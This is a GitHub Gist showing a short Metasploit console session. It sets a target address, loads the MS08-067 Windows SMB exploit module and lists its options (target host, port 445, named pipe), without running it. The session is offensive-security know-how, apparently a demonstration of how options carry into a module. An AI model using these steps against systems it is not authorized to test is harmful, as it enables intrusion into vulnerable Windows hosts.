Created
February 25, 2015 23:34
-
-
Save wchen-r7/774cca4123d1b9271cbf to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ msfconsole | |
msf > set rhost 192.168.1.148 | |
rhost => 192.168.1.148 | |
msf > use exploit/windows/smb/ms08_067_netapi | |
msf exploit(ms08_067_netapi) > show options | |
Module options (exploit/windows/smb/ms08_067_netapi): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
RHOST 192.168.1.148 yes The target address | |
RPORT 445 yes Set the SMB service port | |
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | |
Exploit target: | |
Id Name | |
-- ---- | |
0 Automatic Targeting | |
msf exploit(ms08_067_netapi) > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment